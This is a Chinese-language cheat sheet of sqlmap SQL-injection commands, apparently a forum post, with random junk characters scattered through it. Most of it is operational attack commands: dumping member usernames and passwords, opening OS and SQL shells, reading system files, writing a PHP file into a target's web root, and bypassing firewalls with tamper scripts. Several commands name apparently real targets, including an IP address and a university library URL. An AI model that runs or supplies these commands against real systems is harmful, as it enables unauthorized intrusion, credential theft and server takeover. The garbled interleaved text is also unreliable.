sqlmap使用实例

admin

/pentest/database/sqlmap
! E  D* z$ b# @& t( S( S' y
update :::::>     in the folder   after  execute    following   order : svn update
- f' t5 o4 L, d4 _0 F0 F
) J; a6 O  S' w& H8 f: fsqlmap.py -r 1.txt --current-db

v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
) g6 {! W9 }% I- _* Q
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
猜解数据库
* K8 j3 S/ Z; F& ~' r./sqlmap.py -u "injection-url" --dbs
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
* `/ \5 }  Y8 G/ g7 t3 {
猜解表名
( s" N2 ?9 s. ~./sqlmap.py -u "injection-url" -D database_name --tables
3 k. u" `2 k2 D  {, ^3 U! t; u. @
; T, a# B) T. v2 v# Csqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
5 I& \$ M/ [+ P& y! ksqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"

sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
$ o5 A% g5 a( q# E3 c/ d# N
/ S) H5 F9 h: Ssqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
7 F4 {7 T. B" usqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"

# w# h! ~) _1 X4 E. C/ D3 u( Asqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
! H: J/ @( R7 \5 i+ x/ V3 wsqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
+ I0 N1 I- S5 t- a& z2 L- Tsqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
! Z# E' ?+ U/ O* c2 Y7 a, Ksqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
7 e  M1 X' E" w5 D2 M' k' ]3 X
sqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
3 P# V0 P4 f/ ~/ m  d( l  Lsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"

4 `6 D3 k3 X7 b7 \" ?* }) }sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
; |; B+ R8 q$ N" ^) c) A2 _4 q! A猜解列名
! V. C' U2 @. }8 n: ^  J9 ?9 q4 T./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
5 d5 J  `% {  y6 S# ]- S
, q1 T# S, r; ~8 `% jsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
" O. e1 E% Q, d4 `7 r
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
: h2 ^* t8 _5 p" i&submit=Go
猜解值
+ W9 J& Z& E& v  h' S./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
========================================================
搜索表名中包括mana字符的
# T& X+ d0 B, q7 @- V" h3 J4 [3 y2 Y. x/sqlmap.py -u "injection-url" -T mana --search
返回一个交互式sql shell
) e' v! ^. ?0 J5 T9 D0 y  D" c/sqlmap.py -u "injection-url" --sql-shell
3 Q6 J9 ^4 m0 c" |读取指定文件（需权限）
, K! ?, T* Z2 o8 u) _/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
0 f' v% q5 b/ t- W! F1 Y查看当前 用户 及 数据库
/sqlmap.py -u "injection-url" --current-user --current-db
本地文件 写入 远程目标绝对路径
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"

8 {" J+ ~" B$ {; b8 `sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
查看某用的权限
( \; x3 |  [9 t, M. c/ W/sqlmap.py -u "injection-url" --privileges -U root
7 M& A% i% ?% I查看当前用户是否为dba
/sqlmap.py -u "injection-url" --is-dba
! s8 k% p* S( e4 P读取所有数据库用户或指定数据库用户的密码
# l9 g7 A* E' P) p4 rsqlmap.py -r 1.txt --users --passwords
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
" j6 Y+ s% p# T$ V' {/ }0 e0 f% S
/sqlmap.py -u "injection-url" --passwords -U root

--start&&--stop 与 --first&&--last 的区别
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   （--start=1 --stop=2 会列出第二条记录。。。。记录例如：0 1 2 3 ……）

从字典中查找(属于暴利破解)存在的表（sqlmap/txt/common-tables.txt）或字段（sqlmap/txt/common-columns.txt）
& E, p; {9 r  @/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
8 c8 ^, h. x' N% K
执行sql语句，如查询@@datadir得到数据库路径（或者user()/database()等等……）
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
8 q9 m. r$ G  c4 q- W9 T* U6 v